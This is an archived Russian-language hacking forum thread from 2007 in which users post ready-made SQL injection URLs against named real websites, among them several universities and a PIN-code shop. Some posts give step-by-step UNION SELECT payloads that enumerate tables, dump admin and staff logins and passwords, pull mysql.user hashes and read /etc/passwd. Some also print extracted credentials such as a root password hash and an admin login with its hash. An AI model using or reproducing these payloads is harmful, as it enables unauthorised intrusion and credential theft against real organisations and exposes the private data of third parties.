Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
30.07.2007, 01:37
|
|
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052
Репутация:
1204
|
|
Dominican University of California
http://www.dominican.edu/query/class.php?event_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,convert(con cat(user(),char(58),version(),char(58),database()) %20using%20latin1),11,12,13,14,15,16,17,18,19,20,2 1/*
|
|
|
30.07.2007, 02:02
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753
Репутация:
552
|
|
магазин PIN-кодов
Код:
http://popolni.in.ua/shop.php?r=-1+union+select+1,2,3,concat(id,0x3a,pass,0x3a,name,0x3a,status),5,6,7+from+admins+limit+1,1/*
|
|
|
|
30.07.2007, 04:33
|
|
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052
Репутация:
1204
|
|
University of Nairobi // ну да, сегодня универы :(
Подозрение
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID='
Подбираем колонки
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12/*
Узнаем основную информацию
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID=-1%20union%20select%201,concat(user(),char(58),vers ion(),char(58),database()),3,4,5,6,7,8,9,10,11,12/*
Пятерка. Смотрим таблицы и колонки
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID=-1%20union%20select%201,table_name,3,4,5,6,7,8,9,10 ,11,12%20from%20information_schema.tables/*
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID=-1%20union%20select%201,column_name,3,4,5,6,7,8,9,1 0,11,12%20from%20information_schema.columns/*
Выводим че-нить..
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID=-1%20union%20select%201,concat(EMAIL,char(58),PASSW ORD),3,4,5,6,7,8,9,10,11,12%20from%20UNIVERSITY_ST AFF/*
|
|
|
|
30.07.2007, 10:13
|
|
Новичок
Регистрация: 27.07.2007
Сообщений: 1
Провел на форуме:
4411
Репутация:
0
|
|
club.azlk.ru
http://club.azlk.ru/index.php3?mode=showcar&carid=-1+union+select+1,passwd,nick,4,5,6,7,8,9,10,name,1 2,13,14,15,16+from+users+limit+1,1
|
|
|
|
30.07.2007, 15:54
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036
Репутация:
726
|
|
_http://www.dubinushka.ru/m_files.php?ms_id=-54+union+select+1,concat(login,0x3a,pass)+from+use rs/*
|
|
|
|
30.07.2007, 20:58
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
На сайтеге http://looperman.com/loops.php
http://looperman.com/loops.php?gid=-1'+UNION+SELECT+USER(),VERSION(),3,DATABASE(),5,6, 7,8,9,10,11,12,13,14,15,16,table_name,18,19,20,21+ FROM+information_schema.tables/*
|
|
|
|
01.08.2007, 12:11
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427
Репутация:
187
|
|
EDU:
Код:
http://ctbp.ucsd.edu/workshops/index.php?id=-18%27+union+select+1,version(),username,4,5,6,7,8,9,10,11,12,13,14+from+users/*
Код:
http://journalism.berkeley.edu/events/details.php?ID=397+union+select+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/*
Код:
http://crca.ucsd.edu/views.php?id=-5+union+select+1,version(),concat_ws(0x3a,user,password)+from+mysql.user+limit+0,1/*
stanford?
Код:
http://auroraforum.stanford.edu/events.php?id=-47+union+select+1,2,3,4,5,convert(user()+using+latin1),7,8,9,10,11,12,13,14,15,16+from+mysql.user/*
root@localhost
Код:
http://auroraforum.stanford.edu/events.php?id=-47+union+select+1,2,3,4,5,convert(concat(user,0x3a,password)+using+latin1),7,8,9,10,11,12,13,14,15,16+from+mysql.user+limit+0,1/*
root:*B8EE85A14FC4800165C57E0B7C18B2CBC1EE3EC8
Код:
http://auroraforum.stanford.edu/events.php?id=-47+union+select+1,2,3,4,5,convert(load_file('/etc/passwd')+using+latin1),7,8,9,10,11,12,13,14,15,16+from+mysql.user+limit+0,1/*
/etc/passwd
Последний раз редактировалось Dr.Frank; 01.08.2007 в 12:57..
|
|
|
|
01.08.2007, 13:58
|
|
Новичок
Регистрация: 31.07.2007
Сообщений: 1
Провел на форуме:
6359
Репутация:
0
|
|
Мой первый пост (вроде не боян):
http://www.ourpeople.ru/db.cgi?p=671'
ну тут все тривиально и неинтересно....
http://www.ourpeople.ru/db.cgi?p=-1%20union%20select%20ID,null,null,null,null,null,N ame,NickName,null,null,password%20as%20WWWPage,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null%20FROM%20Users%20WHERE%20ID IN (1602)
- ибо знак "=" рвет запрос
|
|
|
|
01.08.2007, 20:51
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
http://www.xewb.com/
Код:
http://www.xewb.com/show_cat.php?cat_id=-1+union+select+1,concat_ws(login,0x3a,password)+from+dir_login/*
Load_File работает, ибо рут, как ни странно, имеет File_Priv. 
user: root@localhost
database: xewbcom_dbroot@localhost
version: root@localhost4.1.20
User&Pass: 4admin:01f8f7cdac8b238f7db655246a8aa894
|
|
|
|
02.08.2007, 14:46
|
|
Познающий
Регистрация: 27.03.2006
Сообщений: 86
Провел на форуме:
972602
Репутация:
52
|
|
skidmore.edu
Код:
http://www.skidmore.edu/academics/art/artimages/image.php?id=-1%20UNION%20SELECT%201/*
(появляется изображение > смотрим исходный код)
Load_File() работает
user:root@localhost
dukemednews.duke.edu
http://dukemednews.duke.edu/news/article.php?id=-1%20UNION%20SELECT%201,2,3,44444,DATABASE(),6,USER (),55/*
Последний раз редактировалось Dagon; 02.08.2007 в 16:31..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
